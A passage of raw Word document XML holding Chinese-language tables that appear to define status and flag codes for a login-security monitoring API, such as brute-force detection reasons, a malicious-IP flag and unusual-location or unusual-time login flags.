          <w:p w14:paraId="124D00FB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F2B5EAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DDBBCE2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>手动解封</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="748C95A1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69136CD1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="294279AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76429CF7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>解封中</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="17183958" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="505542E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71F3F2FA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36BD4BF8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>封停中</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2B056D97" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="175CAD0D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59679B85" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76C62850" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>封停失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="77B6EECF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A49FC52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53618DAF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60855FBE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>解封失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FF485E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="299" w:name="暴力破解判定为爆破的原因类型）"/>
      <w:bookmarkEnd w:id="298"/>
      <w:r>
        <w:t>暴力破解判定为爆破的原因（类型）</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="873"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="3244"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="203596B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2C15E10" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F42444E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C4362E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="73387830" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42E42580" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="457F87BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4886B772" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>相同IP下同一用户名登录多次</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="359FAF66" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5867B93B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E39E693" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E4F5C96" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>相同IP下多个不存在的用户名登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="014465B4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A18ABC7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F82D553" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="493E976F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>指定时间内重试达到指定次数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="37FE5ED7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="300" w:name="是否恶意ip库"/>
      <w:bookmarkEnd w:id="299"/>
      <w:r>
        <w:t>是否恶意IP库</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="997"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="67C37C0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4893DA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="100E9239" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A0C5FCA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1483A00C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51793856" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>evilIpDb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32730C64" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02AF274E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="432411D0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="189FB57F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>evilIpDb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4202780B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73C40C98" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59CC364C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="301" w:name="是否暴力破解成功的登录"/>
      <w:bookmarkEnd w:id="300"/>
      <w:r>
        <w:t>是否暴力破解成功的登录</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1459"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="195CA4FA"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A4BE45E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C84AD10" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28EFFA28" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="23AB0CB1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1231D980" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>crackSuccess</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D71AC57" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CED38DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="72FB5098" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7412A1B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>crackSuccess</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09D1D068" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5134D5CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E4FD4BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="302" w:name="不在常用ip段登录"/>
      <w:bookmarkEnd w:id="301"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>不在常用ip段登录</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1334"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="675DA8D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7A0A0A3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="783F6879" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3397F34D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="49309311" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F24029A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>abnormalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73847907" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C23EC64" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1E35093C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6786CBBD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>abnormalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39430653" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B5670DF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73AFFDB0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="303" w:name="不在常用区域的登录"/>
      <w:bookmarkEnd w:id="302"/>
      <w:r>
        <w:t>不在常用区域的登录</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1968"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="594C3B4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1A4404C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55438B16" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B3B9EEA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="26D75497" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C8A8BC0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>abnormalLocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A201BBE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CD51D71" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="752F2F1F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DD4E4D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>abnormalLocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B5C10F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76033C5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E2F9DCA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="304" w:name="不在常用时间的登录"/>
      <w:bookmarkEnd w:id="303"/>
      <w:r>
        <w:t>不在常用时间的登录</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1612"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4688598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3C52D04" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E5CDC19" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B74AFC7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4CB0B949" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77DE9F93" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>abnormalTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
